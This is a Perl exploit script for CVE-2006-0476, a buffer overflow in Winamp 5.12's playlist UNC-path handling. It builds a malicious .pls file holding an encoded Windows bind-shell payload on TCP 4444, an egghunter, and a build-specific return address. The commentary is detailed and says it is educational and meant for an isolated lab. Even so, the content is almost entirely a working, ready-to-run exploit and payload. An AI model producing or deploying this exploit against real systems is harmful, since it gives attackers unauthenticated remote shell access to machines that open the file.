CVE-2006-0476: Winamp 5.12 Buffer Overflow (Egghunter)
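#!/usr/bin/perl -w
# ====================================================================
# Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit
# (CVE-2006-0476)
# Original PoC by Umesh Wanve (umesh_345@yahoo.com)
# Modified by r00tpgp for educational purposes - 28 May 2018
# Full documentation at www.r00tpgp.com
# ====================================================================
# Writes poc-00.pls: a playlist whose File1= entry holds an over-long UNC
# computer name.  The entry is built from three fixed-size stages (sizes
# come from the original PoC and are verified below before anything is
# written, because the offsets only line up at exactly these lengths):
#   $jmp        16 bytes   return address + "sub esp,0x58" x2 + "jmp esp"
#   $shellcode 166 bytes   NOP sled + 126-byte egghunter + 34 bytes filler
#   $nop       856 bytes   "T00WT00W" egg + 744-byte bind shell + 104 NOPs
# File order is: header, $nop, $shellcode, $jmp, trailer.
#
# Handle with care: the payload is an UNAUTHENTICATED bind shell listening
# on TCP 4444 (see the msfpayload line).  Only open the generated file in
# an isolated lab VM running Winamp 5.12; anything that can reach that
# host on 4444 gets a shell.  The return address is build-specific and
# must be re-found for any other Winamp version.
use strict;
use warnings;

# Bind shell, generated with:
# msfpayload windows/shell_bind_tcp LPORT=4444 R > bind
# msfencode -e x86/alpha_mixed -i bind -t perl
# [*] x86/alpha_mixed succeeded with size 744 (iteration=1)
my $bind = "" .
"\x89\xe7\xdb\xce\xd9\x77\xf4\x5d\x55\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x59\x6c\x6d\x38\x6d\x59\x47\x70\x33\x30" .
"\x57\x70\x31\x70\x4f\x79\x78\x65\x50\x31\x38\x52\x30\x64" .
"\x6e\x6b\x61\x42\x36\x50\x4e\x6b\x72\x72\x46\x6c\x6e\x6b" .
"\x51\x42\x37\x64\x4c\x4b\x54\x32\x45\x78\x36\x6f\x78\x37" .
"\x42\x6a\x46\x46\x75\x61\x69\x6f\x56\x51\x39\x50\x4c\x6c" .
"\x35\x6c\x73\x51\x71\x6c\x57\x72\x66\x4c\x35\x70\x79\x51" .
"\x38\x4f\x54\x4d\x73\x31\x38\x47\x4b\x52\x5a\x50\x66\x32" .
"\x36\x37\x4c\x4b\x73\x62\x52\x30\x4e\x6b\x70\x42\x37\x4c" .
"\x66\x61\x7a\x70\x6e\x6b\x31\x50\x74\x38\x6b\x35\x59\x50" .
"\x50\x74\x32\x6a\x66\x61\x38\x50\x52\x70\x6c\x4b\x42\x68" .
"\x65\x48\x4c\x4b\x76\x38\x67\x50\x47\x71\x69\x43\x68\x63" .
"\x37\x4c\x43\x79\x6c\x4b\x67\x44\x6c\x4b\x57\x71\x58\x56" .
"\x70\x31\x4b\x4f\x44\x71\x49\x50\x6e\x4c\x4f\x31\x7a\x6f" .
"\x66\x6d\x46\x61\x5a\x67\x44\x78\x39\x70\x42\x55\x7a\x54" .
"\x47\x73\x31\x6d\x6c\x38\x65\x6b\x63\x4d\x51\x34\x64\x35" .
"\x38\x62\x50\x58\x4c\x4b\x33\x68\x64\x64\x63\x31\x38\x53" .
"\x30\x66\x4e\x6b\x54\x4c\x30\x4b\x6e\x6b\x70\x58\x77\x6c" .
"\x47\x71\x59\x43\x6c\x4b\x34\x44\x6c\x4b\x77\x71\x6e\x30" .
"\x6b\x39\x30\x44\x37\x54\x67\x54\x43\x6b\x73\x6b\x63\x51" .
"\x76\x39\x33\x6a\x33\x61\x49\x6f\x69\x70\x36\x38\x61\x4f" .
"\x50\x5a\x4e\x6b\x77\x62\x6a\x4b\x6d\x56\x61\x4d\x45\x38" .
"\x75\x63\x45\x62\x43\x30\x67\x70\x75\x38\x72\x57\x63\x43" .
"\x70\x32\x31\x4f\x70\x54\x52\x48\x62\x6c\x71\x67\x57\x56" .
"\x57\x77\x59\x6f\x69\x45\x4f\x48\x7a\x30\x45\x51\x55\x50" .
"\x45\x50\x31\x39\x7a\x64\x73\x64\x56\x30\x55\x38\x65\x79" .
"\x4f\x70\x62\x4b\x77\x70\x6b\x4f\x4a\x75\x76\x30\x76\x30" .
"\x70\x50\x56\x30\x71\x50\x72\x70\x67\x30\x50\x50\x73\x58" .
"\x48\x6a\x74\x4f\x49\x4f\x4b\x50\x4b\x4f\x48\x55\x4b\x39" .
"\x59\x57\x74\x71\x4b\x6b\x76\x33\x70\x68\x47\x72\x33\x30" .
"\x66\x71\x63\x6c\x4f\x79\x6d\x36\x42\x4a\x54\x50\x76\x36" .
"\x73\x67\x50\x68\x6f\x32\x69\x4b\x76\x57\x55\x37\x49\x6f" .
"\x79\x45\x42\x73\x73\x67\x65\x38\x38\x37\x39\x79\x77\x48" .
"\x69\x6f\x59\x6f\x4b\x65\x63\x63\x32\x73\x42\x77\x35\x38" .
"\x43\x44\x48\x6c\x77\x4b\x68\x61\x6b\x4f\x5a\x75\x61\x47" .
"\x4e\x69\x38\x47\x72\x48\x44\x35\x72\x4e\x52\x6d\x75\x31" .
"\x49\x6f\x6a\x75\x45\x38\x51\x73\x62\x4d\x32\x44\x47\x70" .
"\x4d\x59\x5a\x43\x63\x67\x72\x77\x33\x67\x34\x71\x6b\x46" .
"\x50\x6a\x67\x62\x50\x59\x71\x46\x38\x62\x39\x6d\x31\x76" .
"\x6a\x67\x37\x34\x76\x44\x67\x4c\x77\x71\x67\x71\x4c\x4d" .
"\x51\x54\x46\x44\x34\x50\x38\x46\x65\x50\x52\x64\x53\x64" .
"\x62\x70\x36\x36\x52\x76\x62\x76\x72\x66\x72\x76\x30\x4e" .
"\x30\x56\x50\x56\x33\x63\x33\x66\x55\x38\x53\x49\x7a\x6c" .
"\x67\x4f\x6c\x46\x59\x6f\x79\x45\x6d\x59\x6d\x30\x30\x4e" .
"\x30\x56\x51\x56\x79\x6f\x34\x70\x35\x38\x47\x78\x6b\x37" .
"\x35\x4d\x75\x30\x59\x6f\x68\x55\x6f\x4b\x7a\x50\x4c\x75" .
"\x4f\x52\x33\x66\x53\x58\x4c\x66\x5a\x35\x6f\x4d\x6d\x4d" .
"\x69\x6f\x49\x45\x75\x6c\x67\x76\x61\x6c\x55\x5a\x6f\x70" .
"\x69\x6b\x39\x70\x50\x75\x66\x65\x4f\x4b\x72\x67\x42\x33" .
"\x33\x42\x52\x4f\x53\x5a\x65\x50\x76\x33\x69\x6f\x4b\x65" .
"\x41\x41";

# Egghunter, 126 bytes, also alpha_mixed-encoded (the tag it searches for
# is therefore not readable in the hex; it is expected to match the
# "T00WT00W" egg placed at the front of $nop below).
# Original gist had "egghunter=" without the "$" sigil, which does not
# compile and left $egghunter undefined further down.
my $egghunter = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a".
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x7a\x32\x41\x42\x41\x32".
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x49\x79\x65\x36\x4d".
"\x51\x4b\x7a\x49\x6f\x56\x6f\x52\x62\x70\x52\x42\x4a\x46\x62\x41".
"\x48\x38\x4d\x46\x4e\x65\x6c\x65\x55\x72\x7a\x50\x74\x7a\x4f\x58".
"\x38\x70\x54\x36\x50\x34\x70\x72\x77\x6e\x6b\x5a\x5a\x4e\x4f\x54".
"\x35\x4b\x5a\x6e\x4f\x51\x65\x4d\x37\x4b\x4f\x5a\x47\x6a";

# Playlist header.  "\\\\" in a double-quoted Perl string is two
# backslashes, i.e. the UNC prefix; the "computer name" that follows is
# the overflowing field.
my $start = "[playlist]\r\nFile1=\\\\";

# Stage 1 (16 bytes).  "\x61\xd9\x02\x02" is 0x0202D961 little-endian,
# described by the original PoC as a "call esp" in Winamp 5.12.  Control
# then reaches the bytes after it: "sub esp,0x58" twice (0x58 = 88, so
# esp moves back 176 bytes -- the original comment said 175) and
# "jmp esp" (\xff\xe4), which lands in the egghunter stage.  Four NOPs pad
# the stage to 16 bytes.
my $jmp = "\x61\xd9\x02\x02"
        . "\x83\xec\x58\x83\xec\x58\xff\xe4"
        . "\x90\x90\x90\x90";

# Stage 2 (166 bytes): 6 NOPs + 126-byte egghunter + 34 bytes of filler.
# NOTE(review): "\cc" is Perl's control-character escape and produces
# 0x03 (Ctrl-C), not the 0xCC/INT3 its spelling suggests.  Kept as-is
# because it is only padding after the egghunter; change to "\xcc" if a
# breakpoint pad was intended.
my $shellcode = ("\x90" x 6) . $egghunter . ("\cc" x 34);

# Stage 3 (856 bytes): 8-byte egg tag + 744-byte bind shell + 104 NOPs.
my $nop = "T00WT00W" . $bind . ("\x90" x 104);

# Playlist trailer.
my $end = "\r\nTitle1=pwnd\r\nLength1=512\r\nNumberOfEntries=1\r\nVersion=2\r\n";

# Refuse to write a file whose stage sizes have drifted (e.g. after
# swapping in a payload of a different size): the sub esp / jmp esp
# arithmetic above only works at exactly these lengths.
my %expected_len = ( jmp => 16, shellcode => 166, nop => 856 );
my %stage        = ( jmp => $jmp, shellcode => $shellcode, nop => $nop );
for my $name ( sort keys %expected_len ) {
    my $got = length $stage{$name};
    die "stage $name is $got bytes, expected $expected_len{$name}"
        if $got != $expected_len{$name};
}

# Emit the playlist as raw bytes.  binmode prevents newline translation on
# Windows, which would corrupt the "\r\n" framing and any 0x0a byte the
# payload might contain.  Errors are fatal rather than silently ignored.
my $outfile = 'poc-00.pls';
open my $fh, '>', $outfile or die "open $outfile: $!";
binmode $fh;
print {$fh} $start, $nop, $shellcode, $jmp, $end
    or die "write $outfile: $!";
close $fh or die "close $outfile: $!";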